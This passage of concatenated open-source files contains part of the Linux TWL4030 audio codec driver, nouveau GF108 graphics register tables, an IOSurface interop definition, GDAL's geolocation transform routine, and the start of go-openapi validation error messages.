twl4030->slave_substream = substream; /* The DAI has one configuration for playback and capture, so * if the DAI has been already configured then constrain this * substream to match it. */ if (twl4030->configured) twl4030_constraints(twl4030, twl4030->master_substream); } else { if (!(twl4030_read(component, TWL4030_REG_CODEC_MODE) & TWL4030_OPTION_1)) { /* In option2 4 channel is not supported, set the * constraint for the first stream for channels, the * second stream will 'inherit' this cosntraint */ snd_pcm_hw_constraint_single(substream->runtime, SNDRV_PCM_HW_PARAM_CHANNELS, 2); } twl4030->master_substream = substream; } return 0; } static void twl4030_shutdown(struct snd_pcm_substream *substream, struct snd_soc_dai *dai) { struct snd_soc_component *component = dai->component; struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); if (twl4030->master_substream == substream) twl4030->master_substream = twl4030->slave_substream; twl4030->slave_substream = NULL; /* If all streams are closed, or the remaining stream has not yet * been configured than set the DAI as not configured. */ if (!twl4030->master_substream) twl4030->configured = 0; else if (!twl4030->master_substream->runtime->channels) twl4030->configured = 0; /* If the closing substream had 4 channel, do the necessary cleanup */ if (substream->runtime->channels == 4) twl4030_tdm_enable(component, substream->stream, 0); } static int twl4030_hw_params(struct snd_pcm_substream *substream, struct snd_pcm_hw_params *params, struct snd_soc_dai *dai) { struct snd_soc_component *component = dai->component; struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); u8 mode, old_mode, format, old_format; /* If the substream has 4 channel, do the necessary setup */ if (params_channels(params) == 4) { format = twl4030_read(component, TWL4030_REG_AUDIO_IF); mode = twl4030_read(component, TWL4030_REG_CODEC_MODE); /* Safety check: are we in the correct operating mode and * the interface is in TDM mode? */ if ((mode & TWL4030_OPTION_1) && ((format & TWL4030_AIF_FORMAT) == TWL4030_AIF_FORMAT_TDM)) twl4030_tdm_enable(component, substream->stream, 1); else return -EINVAL; } if (twl4030->configured) /* Ignoring hw_params for already configured DAI */ return 0; /* bit rate */ old_mode = twl4030_read(component, TWL4030_REG_CODEC_MODE) & ~TWL4030_CODECPDZ; mode = old_mode & ~TWL4030_APLL_RATE; switch (params_rate(params)) { case 8000: mode |= TWL4030_APLL_RATE_8000; break; case 11025: mode |= TWL4030_APLL_RATE_11025; break; case 12000: mode |= TWL4030_APLL_RATE_12000; break; case 16000: mode |= TWL4030_APLL_RATE_16000; break; case 22050: mode |= TWL4030_APLL_RATE_22050; break; case 24000: mode |= TWL4030_APLL_RATE_24000; break; case 32000: mode |= TWL4030_APLL_RATE_32000; break; case 44100: mode |= TWL4030_APLL_RATE_44100; break; case 48000: mode |= TWL4030_APLL_RATE_48000; break; case 96000: mode |= TWL4030_APLL_RATE_96000; break; default: dev_err(component->dev, "%s: unknown rate %d\n", __func__, params_rate(params)); return -EINVAL; } /* sample size */ old_format = twl4030_read(component, TWL4030_REG_AUDIO_IF); format = old_format; format &= ~TWL4030_DATA_WIDTH; switch (params_width(params)) { case 16: format |= TWL4030_DATA_WIDTH_16S_16W; break; case 32: format |= TWL4030_DATA_WIDTH_32S_24W; break; default: dev_err(component->dev, "%s: unsupported bits/sample %d\n", __func__, params_width(params)); return -EINVAL; } if (format != old_format || mode != old_mode) { if (twl4030->codec_powered) { /* * If the codec is powered, than we need to toggle the * codec power. */ twl4030_codec_enable(component, 0); twl4030_write(component, TWL4030_REG_CODEC_MODE, mode); twl4030_write(component, TWL4030_REG_AUDIO_IF, format); twl4030_codec_enable(component, 1); } else { twl4030_write(component, TWL4030_REG_CODEC_MODE, mode); twl4030_write(component, TWL4030_REG_AUDIO_IF, format); } } /* Store the important parameters for the DAI configuration and set * the DAI as configured */ twl4030->configured = 1; twl4030->rate = params_rate(params); twl4030->sample_bits = hw_param_interval(params, SNDRV_PCM_HW_PARAM_SAMPLE_BITS)->min; twl4030->channels = params_channels(params); /* If both playback and capture streams are open, and one of them * is setting the hw parameters right now (since we are here), set * constraints to the other stream to match the current one. */ if (twl4030->slave_substream) twl4030_constraints(twl4030, substream); return 0; } static int twl4030_set_dai_sysclk(struct snd_soc_dai *codec_dai, int clk_id, unsigned int freq, int dir) { struct snd_soc_component *component = codec_dai->component; struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); switch (freq) { case 19200000: case 26000000: case 38400000: break; default: dev_err(component->dev, "Unsupported HFCLKIN: %u\n", freq); return -EINVAL; } if ((freq / 1000) != twl4030->sysclk) { dev_err(component->dev, "Mismatch in HFCLKIN: %u (configured: %u)\n", freq, twl4030->sysclk * 1000); return -EINVAL; } return 0; } static int twl4030_set_dai_fmt(struct snd_soc_dai *codec_dai, unsigned int fmt) { struct snd_soc_component *component = codec_dai->component; struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); u8 old_format, format; /* get format */ old_format = twl4030_read(component, TWL4030_REG_AUDIO_IF); format = old_format; /* set master/slave audio interface */ switch (fmt & SND_SOC_DAIFMT_MASTER_MASK) { case SND_SOC_DAIFMT_CBM_CFM: format &= ~(TWL4030_AIF_SLAVE_EN); format &= ~(TWL4030_CLK256FS_EN); break; case SND_SOC_DAIFMT_CBS_CFS: format |= TWL4030_AIF_SLAVE_EN; format |= TWL4030_CLK256FS_EN; break; default: return -EINVAL; } /* interface format */ format &= ~TWL4030_AIF_FORMAT; switch (fmt & SND_SOC_DAIFMT_FORMAT_MASK) { case SND_SOC_DAIFMT_I2S: format |= TWL4030_AIF_FORMAT_CODEC; break; case SND_SOC_DAIFMT_DSP_A: format |= TWL4030_AIF_FORMAT_TDM; break; default: return -EINVAL; } if (format != old_format) { if (twl4030->codec_powered) { /* * If the codec is powered, than we need to toggle the * codec power. */ twl4030_codec_enable(component, 0); twl4030_write(component, TWL4030_REG_AUDIO_IF, format); twl4030_codec_enable(component, 1); } else { twl4030_write(component, TWL4030_REG_AUDIO_IF, format); } } return 0; } static int twl4030_set_tristate(struct snd_soc_dai *dai, int tristate) { struct snd_soc_component *component = dai->component; u8 reg = twl4030_read(component, TWL4030_REG_AUDIO_IF); if (tristate) reg |= TWL4030_AIF_TRI_EN; else reg &= ~TWL4030_AIF_TRI_EN; return twl4030_write(component, TWL4030_REG_AUDIO_IF, reg); } /* In case of voice mode, the RX1 L(VRX) for downlink and the TX2 L/R * (VTXL, VTXR) for uplink has to be enabled/disabled. */ static void twl4030_voice_enable(struct snd_soc_component *component, int direction, int enable) { u8 reg, mask; reg = twl4030_read(component, TWL4030_REG_OPTION); if (direction == SNDRV_PCM_STREAM_PLAYBACK) mask = TWL4030_ARXL1_VRX_EN; else mask = TWL4030_ATXL2_VTXL_EN | TWL4030_ATXR2_VTXR_EN; if (enable) reg |= mask; else reg &= ~mask; twl4030_write(component, TWL4030_REG_OPTION, reg); } static int twl4030_voice_startup(struct snd_pcm_substream *substream, struct snd_soc_dai *dai) { struct snd_soc_component *component = dai->component; struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); u8 mode; /* If the system master clock is not 26MHz, the voice PCM interface is * not available. */ if (twl4030->sysclk != 26000) { dev_err(component->dev, "%s: HFCLKIN is %u KHz, voice interface needs 26MHz\n", __func__, twl4030->sysclk); return -EINVAL; } /* If the codec mode is not option2, the voice PCM interface is not * available. */ mode = twl4030_read(component, TWL4030_REG_CODEC_MODE) & TWL4030_OPT_MODE; if (mode != TWL4030_OPTION_2) { dev_err(component->dev, "%s: the codec mode is not option2\n", __func__); return -EINVAL; } return 0; } static void twl4030_voice_shutdown(struct snd_pcm_substream *substream, struct snd_soc_dai *dai) { struct snd_soc_component *component = dai->component; /* Enable voice digital filters */ twl4030_voice_enable(component, substream->stream, 0); } static int twl4030_voice_hw_params(struct snd_pcm_substream *substream, struct snd_pcm_hw_params *params, struct snd_soc_dai *dai) { struct snd_soc_component *component = dai->component; struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); u8 old_mode, mode; /* Enable voice digital filters */ twl4030_voice_enable(component, substream->stream, 1); /* bit rate */ old_mode = twl4030_read(component, TWL4030_REG_CODEC_MODE) & ~TWL4030_CODECPDZ; mode = old_mode; switch (params_rate(params)) { case 8000: mode &= ~(TWL4030_SEL_16K); break; case 16000: mode |= TWL4030_SEL_16K; break; default: dev_err(component->dev, "%s: unknown rate %d\n", __func__, params_rate(params)); return -EINVAL; } if (mode != old_mode) { if (twl4030->codec_powered) { /* * If the codec is powered, than we need to toggle the * codec power. */ twl4030_codec_enable(component, 0); twl4030_write(component, TWL4030_REG_CODEC_MODE, mode); twl4030_codec_enable(component, 1); } else { twl4030_write(component, TWL4030_REG_CODEC_MODE, mode); } } return 0; } static int twl4030_voice_set_dai_sysclk(struct snd_soc_dai *codec_dai, int clk_id, unsigned int freq, int dir) { struct snd_soc_component *component = codec_dai->component; struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); if (freq != 26000000) { dev_err(component->dev, "%s: HFCLKIN is %u KHz, voice interface needs 26MHz\n", __func__, freq / 1000); return -EINVAL; } if ((freq / 1000) != twl4030->sysclk) { dev_err(component->dev, "Mismatch in HFCLKIN: %u (configured: %u)\n", freq, twl4030->sysclk * 1000); return -EINVAL; } return 0; } static int twl4030_voice_set_dai_fmt(struct snd_soc_dai *codec_dai, unsigned int fmt) { struct snd_soc_component *component = codec_dai->component; struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); u8 old_format, format; /* get format */ old_format = twl4030_read(component, TWL4030_REG_VOICE_IF); format = old_format; /* set master/slave audio interface */ switch (fmt & SND_SOC_DAIFMT_MASTER_MASK) { case SND_SOC_DAIFMT_CBM_CFM: format &= ~(TWL4030_VIF_SLAVE_EN); break; case SND_SOC_DAIFMT_CBS_CFS: format |= TWL4030_VIF_SLAVE_EN; break; default: return -EINVAL; } /* clock inversion */ switch (fmt & SND_SOC_DAIFMT_INV_MASK) { case SND_SOC_DAIFMT_IB_NF: format &= ~(TWL4030_VIF_FORMAT); break; case SND_SOC_DAIFMT_NB_IF: format |= TWL4030_VIF_FORMAT; break; default: return -EINVAL; } if (format != old_format) { if (twl4030->codec_powered) { /* * If the codec is powered, than we need to toggle the * codec power. */ twl4030_codec_enable(component, 0); twl4030_write(component, TWL4030_REG_VOICE_IF, format); twl4030_codec_enable(component, 1); } else { twl4030_write(component, TWL4030_REG_VOICE_IF, format); } } return 0; } static int twl4030_voice_set_tristate(struct snd_soc_dai *dai, int tristate) { struct snd_soc_component *component = dai->component; u8 reg = twl4030_read(component, TWL4030_REG_VOICE_IF); if (tristate) reg |= TWL4030_VIF_TRI_EN; else reg &= ~TWL4030_VIF_TRI_EN; return twl4030_write(component, TWL4030_REG_VOICE_IF, reg); } #define TWL4030_RATES (SNDRV_PCM_RATE_8000_48000) #define TWL4030_FORMATS (SNDRV_PCM_FMTBIT_S16_LE | SNDRV_PCM_FMTBIT_S32_LE) static const struct snd_soc_dai_ops twl4030_dai_hifi_ops = { .startup = twl4030_startup, .shutdown = twl4030_shutdown, .hw_params = twl4030_hw_params, .set_sysclk = twl4030_set_dai_sysclk, .set_fmt = twl4030_set_dai_fmt, .set_tristate = twl4030_set_tristate, }; static const struct snd_soc_dai_ops twl4030_dai_voice_ops = { .startup = twl4030_voice_startup, .shutdown = twl4030_voice_shutdown, .hw_params = twl4030_voice_hw_params, .set_sysclk = twl4030_voice_set_dai_sysclk, .set_fmt = twl4030_voice_set_dai_fmt, .set_tristate = twl4030_voice_set_tristate, }; static struct snd_soc_dai_driver twl4030_dai[] = { { .name = "twl4030-hifi", .playback = { .stream_name = "HiFi Playback", .channels_min = 2, .channels_max = 4, .rates = TWL4030_RATES | SNDRV_PCM_RATE_96000, .formats = TWL4030_FORMATS, .sig_bits = 24,}, .capture = { .stream_name = "HiFi Capture", .channels_min = 2, .channels_max = 4, .rates = TWL4030_RATES, .formats = TWL4030_FORMATS, .sig_bits = 24,}, .ops = &twl4030_dai_hifi_ops, }, { .name = "twl4030-voice", .playback = { .stream_name = "Voice Playback", .channels_min = 1, .channels_max = 1, .rates = SNDRV_PCM_RATE_8000 | SNDRV_PCM_RATE_16000, .formats = SNDRV_PCM_FMTBIT_S16_LE,}, .capture = { .stream_name = "Voice Capture", .channels_min = 1, .channels_max = 2, .rates = SNDRV_PCM_RATE_8000 | SNDRV_PCM_RATE_16000, .formats = SNDRV_PCM_FMTBIT_S16_LE,}, .ops = &twl4030_dai_voice_ops, }, }; static int twl4030_soc_probe(struct snd_soc_component *component) { struct twl4030_priv *twl4030; twl4030 = devm_kzalloc(component->dev, sizeof(struct twl4030_priv), GFP_KERNEL); if (!twl4030) return -ENOMEM; snd_soc_component_set_drvdata(component, twl4030); /* Set the defaults, and power up the codec */ twl4030->sysclk = twl4030_audio_get_mclk() / 1000; twl4030_init_chip(component); return 0; } static void twl4030_soc_remove(struct snd_soc_component *component) { struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); struct twl4030_codec_data *pdata = twl4030->pdata; if (pdata && pdata->hs_extmute && gpio_is_valid(pdata->hs_extmute_gpio)) gpio_free(pdata->hs_extmute_gpio); } static const struct snd_soc_component_driver soc_component_dev_twl4030 = { .probe = twl4030_soc_probe, .remove = twl4030_soc_remove, .read = twl4030_read, .write = twl4030_write, .set_bias_level = twl4030_set_bias_level, .controls = twl4030_snd_controls, .num_controls = ARRAY_SIZE(twl4030_snd_controls), .dapm_widgets = twl4030_dapm_widgets, .num_dapm_widgets = ARRAY_SIZE(twl4030_dapm_widgets), .dapm_routes = intercon, .num_dapm_routes = ARRAY_SIZE(intercon), .use_pmdown_time = 1, .endianness = 1, .non_legacy_dai_naming = 1, }; static int twl4030_codec_probe(struct platform_device *pdev) { return devm_snd_soc_register_component(&pdev->dev, &soc_component_dev_twl4030, twl4030_dai, ARRAY_SIZE(twl4030_dai)); } MODULE_ALIAS("platform:twl4030-codec"); static struct platform_driver twl4030_codec_driver = { .probe = twl4030_codec_probe, .driver = { .name = "twl4030-codec", }, }; module_platform_driver(twl4030_codec_driver); MODULE_DESCRIPTION("ASoC TWL4030 codec driver"); MODULE_AUTHOR("Steve Sakoman"); MODULE_LICENSE("GPL");
{ "pile_set_name": "Github" }
/* * Copyright 2013 Red Hat Inc. * * Permission is hereby granted, free of charge, to any person obtaining a * copy of this software and associated documentation files (the "Software"), * to deal in the Software without restriction, including without limitation * the rights to use, copy, modify, merge, publish, distribute, sublicense, * and/or sell copies of the Software, and to permit persons to whom the * Software is furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE COPYRIGHT HOLDER(S) OR AUTHOR(S) BE LIABLE FOR ANY CLAIM, DAMAGES OR * OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, * ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR * OTHER DEALINGS IN THE SOFTWARE. * * Authors: Ben Skeggs <[email protected]> */ #include "gf100.h" #include "ctxgf100.h" #include <nvif/class.h> /******************************************************************************* * PGRAPH register lists ******************************************************************************/ const struct gf100_gr_init gf108_gr_init_gpc_unk_0[] = { { 0x418604, 1, 0x04, 0x00000000 }, { 0x418680, 1, 0x04, 0x00000000 }, { 0x418714, 1, 0x04, 0x00000000 }, { 0x418384, 1, 0x04, 0x00000000 }, {} }; const struct gf100_gr_init gf108_gr_init_setup_1[] = { { 0x4188c8, 2, 0x04, 0x00000000 }, { 0x4188d0, 1, 0x04, 0x00010000 }, { 0x4188d4, 1, 0x04, 0x00000001 }, {} }; static const struct gf100_gr_init gf108_gr_init_gpc_unk_1[] = { { 0x418d00, 1, 0x04, 0x00000000 }, { 0x418f08, 1, 0x04, 0x00000000 }, { 0x418e00, 1, 0x04, 0x00000003 }, { 0x418e08, 1, 0x04, 0x00000000 }, {} }; static const struct gf100_gr_init gf108_gr_init_pe_0[] = { { 0x41980c, 1, 0x04, 0x00000010 }, { 0x419810, 1, 0x04, 0x00000000 }, { 0x419814, 1, 0x04, 0x00000004 }, { 0x419844, 1, 0x04, 0x00000000 }, { 0x41984c, 1, 0x04, 0x00005bc5 }, { 0x419850, 4, 0x04, 0x00000000 }, { 0x419880, 1, 0x04, 0x00000002 }, {} }; static const struct gf100_gr_pack gf108_gr_pack_mmio[] = { { gf100_gr_init_main_0 }, { gf100_gr_init_fe_0 }, { gf100_gr_init_pri_0 }, { gf100_gr_init_rstr2d_0 }, { gf100_gr_init_pd_0 }, { gf104_gr_init_ds_0 }, { gf100_gr_init_scc_0 }, { gf100_gr_init_prop_0 }, { gf108_gr_init_gpc_unk_0 }, { gf100_gr_init_setup_0 }, { gf100_gr_init_crstr_0 }, { gf108_gr_init_setup_1 }, { gf100_gr_init_zcull_0 }, { gf100_gr_init_gpm_0 }, { gf108_gr_init_gpc_unk_1 }, { gf100_gr_init_gcc_0 }, { gf100_gr_init_tpccs_0 }, { gf104_gr_init_tex_0 }, { gf108_gr_init_pe_0 }, { gf100_gr_init_l1c_0 }, { gf100_gr_init_wwdx_0 }, { gf100_gr_init_tpccs_1 }, { gf100_gr_init_mpc_0 }, { gf104_gr_init_sm_0 }, { gf100_gr_init_be_0 }, { gf100_gr_init_fe_1 }, {} }; /******************************************************************************* * PGRAPH engine/subdev functions ******************************************************************************/ static const struct gf100_gr_func gf108_gr = { .init = gf100_gr_init, .mmio = gf108_gr_pack_mmio, .fecs.ucode = &gf100_gr_fecs_ucode, .gpccs.ucode = &gf100_gr_gpccs_ucode, .rops = gf100_gr_rops, .grctx = &gf108_grctx, .sclass = { { -1, -1, FERMI_TWOD_A }, { -1, -1, FERMI_MEMORY_TO_MEMORY_FORMAT_A }, { -1, -1, FERMI_A, &gf100_fermi }, { -1, -1, FERMI_B, &gf100_fermi }, { -1, -1, FERMI_COMPUTE_A }, {} } }; int gf108_gr_new(struct nvkm_device *device, int index, struct nvkm_gr **pgr) { return gf100_gr_new_(&gf108_gr, device, index, pgr); }
{ "pile_set_name": "Github" }
depends = CFNetwork CoreFoundation Foundation Security darwin posix language = Objective-C package = platform.IOSurface modules = IOSurface compilerOpts = -framework IOSurface linkerOpts = -framework IOSurface
{ "pile_set_name": "Github" }
/****************************************************************************** * * Project: GDAL * Purpose: Algorithm to apply a transformer to geolocation style bands. * Author: Frank Warmerdam, [email protected] * ****************************************************************************** * Copyright (c) 2012, Frank Warmerdam * * Permission is hereby granted, free of charge, to any person obtaining a * copy of this software and associated documentation files (the "Software"), * to deal in the Software without restriction, including without limitation * the rights to use, copy, modify, merge, publish, distribute, sublicense, * and/or sell copies of the Software, and to permit persons to whom the * Software is furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included * in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS * OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER * DEALINGS IN THE SOFTWARE. ****************************************************************************/ #include "cpl_port.h" #include "gdal_alg.h" #include <cstring> #include "cpl_conv.h" #include "cpl_error.h" #include "cpl_progress.h" #include "gdal.h" #include "gdal_alg_priv.h" #include "gdal_priv.h" CPL_CVSID("$Id$") /************************************************************************/ /* GDALTransformGeolocations() */ /************************************************************************/ /** * Transform locations held in bands. * * The X/Y and possibly Z values in the identified bands are transformed * using a spatial transformer. The changes values are written back to the * source bands so they need to updatable. * * @param hXBand the band containing the X locations (usually long/easting). * @param hYBand the band containing the Y locations (usually lat/northing). * @param hZBand the band containing the Z locations (may be NULL). * @param pfnTransformer the transformer function. * @param pTransformArg the callback data for the transformer function. * @param pfnProgress callback for reporting algorithm progress matching the * GDALProgressFunc() semantics. May be NULL. * @param pProgressArg callback argument passed to pfnProgress. * @param papszOptions list of name/value options - none currently supported. * * @return CE_None on success or CE_Failure if an error occurs. */ CPLErr GDALTransformGeolocations( GDALRasterBandH hXBand, GDALRasterBandH hYBand, GDALRasterBandH hZBand, GDALTransformerFunc pfnTransformer, void *pTransformArg, GDALProgressFunc pfnProgress, void *pProgressArg, CPL_UNUSED char **papszOptions ) { VALIDATE_POINTER1( hXBand, "GDALTransformGeolocations", CE_Failure ); VALIDATE_POINTER1( hYBand, "GDALTransformGeolocations", CE_Failure ); if( pfnProgress == nullptr ) pfnProgress = GDALDummyProgress; /* -------------------------------------------------------------------- */ /* Ensure the bands are matching in size. */ /* -------------------------------------------------------------------- */ GDALRasterBand *poXBand = reinterpret_cast<GDALRasterBand *>(hXBand); GDALRasterBand *poYBand = reinterpret_cast<GDALRasterBand *>(hYBand); GDALRasterBand *poZBand = reinterpret_cast<GDALRasterBand *>(hZBand); const int nXSize = poXBand->GetXSize(); const int nYSize = poXBand->GetYSize(); if( nXSize != poYBand->GetXSize() || nYSize != poYBand->GetYSize() || (poZBand != nullptr && nXSize != poZBand->GetXSize()) || (poZBand != nullptr && nYSize != poZBand->GetYSize()) ) { CPLError( CE_Failure, CPLE_AppDefined, "Size of X, Y and/or Z bands do not match." ); return CE_Failure; } /* -------------------------------------------------------------------- */ /* Allocate a buffer large enough to hold one whole row. */ /* -------------------------------------------------------------------- */ double *padfX = static_cast<double *>(CPLMalloc(sizeof(double) * nXSize)); double *padfY = static_cast<double *>(CPLMalloc(sizeof(double) * nXSize)); double *padfZ = static_cast<double *>(CPLMalloc(sizeof(double) * nXSize)); int *panSuccess = static_cast<int *>(CPLMalloc(sizeof(int) * nXSize)); CPLErr eErr = CE_None; pfnProgress( 0.0, "", pProgressArg ); for( int iLine = 0; eErr == CE_None && iLine < nYSize; iLine++ ) { eErr = poXBand->RasterIO( GF_Read, 0, iLine, nXSize, 1, padfX, nXSize, 1, GDT_Float64, 0, 0, nullptr ); if( eErr == CE_None ) eErr = poYBand->RasterIO( GF_Read, 0, iLine, nXSize, 1, padfY, nXSize, 1, GDT_Float64, 0, 0, nullptr ); if( eErr == CE_None && poZBand != nullptr ) eErr = poZBand->RasterIO( GF_Read, 0, iLine, nXSize, 1, padfZ, nXSize, 1, GDT_Float64, 0, 0, nullptr ); else memset( padfZ, 0, sizeof(double) * nXSize); if( eErr == CE_None ) { pfnTransformer( pTransformArg, FALSE, nXSize, padfX, padfY, padfZ, panSuccess ); } if( eErr == CE_None ) eErr = poXBand->RasterIO( GF_Write, 0, iLine, nXSize, 1, padfX, nXSize, 1, GDT_Float64, 0, 0, nullptr ); if( eErr == CE_None ) eErr = poYBand->RasterIO( GF_Write, 0, iLine, nXSize, 1, padfY, nXSize, 1, GDT_Float64, 0, 0, nullptr ); if( eErr == CE_None && poZBand != nullptr ) eErr = poZBand->RasterIO( GF_Write, 0, iLine, nXSize, 1, padfZ, nXSize, 1, GDT_Float64, 0, 0, nullptr ); if( eErr == CE_None ) pfnProgress( (iLine+1) / static_cast<double>(nYSize), "", pProgressArg ); } /* -------------------------------------------------------------------- */ /* Cleanup */ /* -------------------------------------------------------------------- */ CPLFree( padfX ); CPLFree( padfY ); CPLFree( padfZ ); CPLFree( panSuccess ); return eErr; }
{ "pile_set_name": "Github" }
// Copyright 2015 go-swagger maintainers // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package validate import ( "net/http" "github.com/go-openapi/errors" ) // Error messages related to spec validation and returned as results. const ( // ArrayRequiresItemsError ... ArrayRequiresItemsError = "%s for %q is a collection without an element type (array requires items definition)" // ArrayInParamRequiresItemsError ... ArrayInParamRequiresItemsError = "param %q for %q is a collection without an element type (array requires item definition)" // ArrayInHeaderRequiresItemsError ... ArrayInHeaderRequiresItemsError = "header %q for %q is a collection without an element type (array requires items definition)" // BothFormDataAndBodyError indicates that an operation specifies both a body and a formData parameter, which is forbidden BothFormDataAndBodyError = "operation %q has both formData and body parameters. Only one such In: type may be used for a given operation" // CannotResolveRefError when a $ref could not be resolved CannotResolveReferenceError = "could not resolve reference in %s to $ref %s: %v" // CircularAncestryDefinitionError ... CircularAncestryDefinitionError = "definition %q has circular ancestry: %v" // DefaultValueDoesNotValidateError results from an invalid default value provided DefaultValueDoesNotValidateError = "default value for %s in %s does not validate its schema" // DefaultValueItemsDoesNotValidateError results from an invalid default value provided for Items DefaultValueItemsDoesNotValidateError = "default value for %s.items in %s does not validate its schema" // DefaultValueHeaderDoesNotValidateError results from an invalid default value provided in header DefaultValueHeaderDoesNotValidateError = "in operation %q, default value in header %s for %s does not validate its schema" // DefaultValueHeaderItemsDoesNotValidateError results from an invalid default value provided in header.items DefaultValueHeaderItemsDoesNotValidateError = "in operation %q, default value in header.items %s for %s does not validate its schema" // DefaultValueInDoesNotValidateError ... DefaultValueInDoesNotValidateError = "in operation %q, default value in %s does not validate its schema" // DuplicateParamNameError ... DuplicateParamNameError = "duplicate parameter name %q for %q in operation %q" // DuplicatePropertiesError ... DuplicatePropertiesError = "definition %q contains duplicate properties: %v" // ExampleValueDoesNotValidateError results from an invalid example value provided ExampleValueDoesNotValidateError = "example value for %s in %s does not validate its schema" // ExampleValueItemsDoesNotValidateError results from an invalid example value provided for Items ExampleValueItemsDoesNotValidateError = "example value for %s.items in %s does not validate its schema" // ExampleValueHeaderDoesNotValidateError results from an invalid example value provided in header ExampleValueHeaderDoesNotValidateError = "in operation %q, example value in header %s for %s does not validate its schema" // ExampleValueHeaderItemsDoesNotValidateError results from an invalid example value provided in header.items ExampleValueHeaderItemsDoesNotValidateError = "in operation %q, example value in header.items %s for %s does not validate its schema" // ExampleValueInDoesNotValidateError ... ExampleValueInDoesNotValidateError = "in operation %q, example value in %s does not validate its schema" // EmptyPathParameterError means that a path parameter was found empty (e.g. "{}") EmptyPathParameterError = "%q contains an empty path parameter" // InvalidDocumentError states that spec validation only processes spec.Document objects InvalidDocumentError = "spec validator can only validate spec.Document objects" // InvalidItemsPatternError indicates an Items definition with invalid pattern InvalidItemsPatternError = "%s for %q has invalid items pattern: %q" // InvalidParameterDefinitionError indicates an error detected on a parameter definition InvalidParameterDefinitionError = "invalid definition for parameter %s in %s in operation %q" // InvalidParameterDefinitionAsSchemaError indicates an error detected on a parameter definition, which was mistaken with a schema definition. // Most likely, this situation is encountered whenever a $ref has been added as a sibling of the parameter definition. InvalidParameterDefinitionAsSchemaError = "invalid definition as Schema for parameter %s in %s in operation %q" // InvalidPatternError ... InvalidPatternError = "pattern %q is invalid in %s" // InvalidPatternInError indicates an invalid pattern in a schema or items definition InvalidPatternInError = "%s in %s has invalid pattern: %q" // InvalidPatternInHeaderError indicates a header definition with an invalid pattern InvalidPatternInHeaderError = "in operation %q, header %s for %s has invalid pattern %q: %v" // InvalidPatternInParamError ... InvalidPatternInParamError = "operation %q has invalid pattern in param %q: %q" // InvalidReferenceError indicates that a $ref property could not be resolved InvalidReferenceError = "invalid ref %q" // InvalidResponseDefinitionAsSchemaError indicates an error detected on a response definition, which was mistaken with a schema definition. // Most likely, this situation is encountered whenever a $ref has been added as a sibling of the response definition. InvalidResponseDefinitionAsSchemaError = "invalid definition as Schema for response %s in %s" // MultipleBodyParamError indicates that an operation specifies multiple parameter with in: body MultipleBodyParamError = "operation %q has more than 1 body param: %v" // NonUniqueOperationIDError indicates that the same operationId has been specified several times NonUniqueOperationIDError = "%q is defined %d times" // NoParameterInPathError indicates that a path was found without any parameter NoParameterInPathError = "path param %q has no parameter definition" // NoValidPathErrorOrWarning indicates that no single path could be validated. If Paths is empty, this message is only a warning. NoValidPathErrorOrWarning = "spec has no valid path defined" // NoValidResponseError indicates that no valid response description could be found for an operation NoValidResponseError = "operation %q has no valid response" // PathOverlapError ... PathOverlapError = "path %s overlaps with %s" // PathParamNotInPathError indicates that a parameter specified with in: path was not found in the path specification PathParamNotInPathError = "path param %q is not present in path %q" // PathParamNotUniqueError ... PathParamNotUniqueError = "params in path %q must be unique: %q conflicts with %q" // PathParamNotRequiredError ... PathParamRequiredError = "in operation %q,path param %q must be declared as required" // RefNotAllowedInHeaderError indicates a $ref was found in a header definition, which is not allowed by Swagger RefNotAllowedInHeaderError = "IMPORTANT!in %q: $ref are not allowed in headers. In context for header %q%s" // RequiredButNotDefinedError ... RequiredButNotDefinedError = "%q is present in required but not defined as property in definition %q" // SomeParametersBrokenError indicates that some parameters could not be resolved, which might result in partial checks to be carried on SomeParametersBrokenError = "some parameters definitions are broken in %q.%s. Cannot carry on full checks on parameters for operation %s" // UnresolvedReferencesError indicates that at least one $ref could not be resolved UnresolvedReferencesError = "some references could not be resolved in spec. First found: %v" ) // Warning messages related to spec validation and returned as results const ( // ExamplesWithoutSchemaWarning indicates that examples are provided for a response,but not schema to validate the example against ExamplesWithoutSchemaWarning = "Examples provided without schema in operation %q, %s" // ExamplesMimeNotSupportedWarning indicates that examples are provided with a mime type different than application/json, which // the validator dos not support yetl ExamplesMimeNotSupportedWarning = "No validation attempt for examples for media types other than application/json, in operation %q, %s" // PathParamGarbledWarning ... PathParamGarbledWarning = "in path %q, param %q contains {,} or white space. Albeit not stricly illegal, this is probably no what you want" // PathStrippedParamGarbledWarning ... PathStrippedParamGarbledWarning = "path stripped from path parameters %s 